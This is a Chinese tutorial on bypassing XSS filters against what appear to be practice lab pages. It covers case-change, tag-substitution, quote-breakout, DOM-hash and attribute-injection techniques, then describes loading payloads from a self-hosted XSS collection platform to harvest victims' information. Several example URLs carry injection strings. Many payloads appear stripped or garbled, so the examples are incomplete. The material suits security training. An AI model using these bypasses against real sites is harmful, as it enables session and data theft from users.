XSS过滤绕过手法与加载payload

XSS基本绕过手法

1、关键词大小写绕过

http://target_sys.com/xss/xss04.php?name=

2、关键词单次过滤绕过

http://target_sys.com/xss/xss05.php?name=>alert(1);ript>

3、对script标签过滤，用img标签绕过进行xss注入

http://target_sys.com/xss/xss06.php?name=testit

4、禁用alert，同上用img标签配合confirm绕过

http://target_sys.com/xss/xss07.php?name=

5、控制js输出的xss

场景：前端代码中存在可控变量

<script>
    var $yy = "简单测试一下xxxxxxx"
</script>

http://target_sys.com/xss/xss08.php?name=";alert($yy)//

6、同上在过滤双引号时通过单引号的注入

http://target_sys.com/xss/xss09.php?name=testit';alert($a);//

7、dom类型xss注入

网页代码

hash 属性是一个可读可写的字符串，该字符串是 URL 的锚部分（从 # 号开始的部分）。
substring 从#开始截取后面的部分

http://target_sys.com/xss/xss10.php?name=testit#
http://target_sys.com/xss/xss10.php?name=testit#

8、可控php变量的xss注入
这里可通过get的url传参控制action的值来对其中$变量控制

这里可通过get的url传参控制action的值来对其中$变量控制

http://target_sys.com/xss/xss11.php/" onsubmit="alert('1')

注入后submit点击就可执行注入

9、过滤特殊字符的绕过
php开启gpc之后
单引号（’）、双引号（”）、反斜线（/）与 NULL等字符都会被加上反斜线，绕过方式:编码解码

http://target_sys.com/xss/xss12.php?name= #被过滤
http://target_sys.com/xss/xss12.php?name=#baypass

XSS注入加载payload

前提：搭建自己的XSS利用平台，这里其本地hosts域名为www.xsstools.com，以此为基础用XSS注入加载payloads，

搭建举例： https://blog.51cto.com/u_15288375/2967775

1、标准script加载

一般在留言框中应用

注入可形成存储型XSS，再次刷新页面可查看注入payload

或者在XSS利用平台查看信息注入获取信息

2.在url注入的img标签dom XSS注入

注入后刷新网络可查看get报文的注入获取

或者在XSS平台也可见注入获取信息

3.字符拼接的XSS注入

主要用于对输入输出字符限制情况下的XSS注入

将xss注入代码切片分段用

document.write("")#注入代码实例

分段切片写入html文件

执行后可查看到注入获取信息